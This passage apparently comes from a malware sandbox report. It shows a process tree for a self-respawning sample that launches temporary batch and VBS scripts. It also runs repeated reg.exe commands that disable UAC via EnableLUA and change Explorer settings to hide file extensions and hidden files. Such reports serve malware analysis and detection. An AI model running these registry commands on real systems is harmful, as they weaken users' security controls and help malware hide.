        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        134⤵
        UAC bypass
        
        PID:1064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        134⤵
        
        PID:1136
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        134⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        132⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMYAcAkA.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        132⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        133⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        132⤵
        UAC bypass
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        132⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        130⤵
        
        PID:3676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        130⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        130⤵
        Modifies registry key
        
        PID:4896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TEYckggA.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        130⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        131⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        128⤵
        
        PID:3904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        129⤵
        UAC bypass
        
        PID:212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        128⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uAwYIIsE.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        128⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        128⤵
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        Modifies registry key
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        127⤵
        Modifies visibility of file extensions in Explorer
        
        PID:696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oykYAEEg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        126⤵
        
        PID:396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        127⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        Modifies registry key
        
        PID:640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XkQsUsME.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        124⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PsIEwgAs.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        122⤵
        
        PID:680
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        Modifies registry key
        
        PID:2592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:5008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        121⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        Modifies registry key
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        Modifies registry key
        
        PID:696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AIEkEsMY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        120⤵
        
        PID:4116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        121⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MScoQsEs.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        118⤵
        
        PID:4952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        119⤵
        UAC bypass
        
        PID:3768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        Modifies registry key
        
        PID:1360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:4944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        117⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oWgcwcsI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        116⤵
        
        PID:208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        Modifies registry key
        
        PID:1476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zIoMQYYI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        114⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        Modifies registry key
        
        PID:3580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UYMwsEIw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        112⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:2364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        Modifies registry key
        
        PID:5028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TaIsgcok.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        110⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        Modifies registry key
        
        PID:2864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewMAcYQY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        108⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AWEcwYoY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        106⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        
        PID:852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        
        PID:4876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        
        PID:4172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:3744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HIIoIIwE.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        104⤵
        
        PID:4040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        105⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        
        PID:4932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        103⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jGYgMgcQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        102⤵
        
        PID:3964
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NkwMMEIc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        100⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        Modifies registry key
        
        PID:2736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NsEsgcAI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        98⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SckUgUsw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        96⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        
        PID:3412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:4952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        97⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        
        PID:1108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:4020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\awcogUQc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        94⤵
        
        PID:708
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        Modifies registry key
        
        PID:1120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        Modifies registry key
        
        PID:2712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        Modifies registry key
        
        PID:4252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fycQIgMI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        92⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        
        PID:3480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bOMEIAcc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        90⤵
        
        PID:684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        91⤵
        
        PID:632
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EKMgwEMQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        88⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:1028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        Modifies registry key
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oEkIMQcc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        86⤵
        
        PID:4260
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:4296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        UAC bypass
        
        PID:316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        Modifies registry key
        
        PID:4980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        
        PID:212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BckEoMgk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        84⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        83⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        Modifies registry key
        
        PID:3524
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        83⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\reg.exe
        
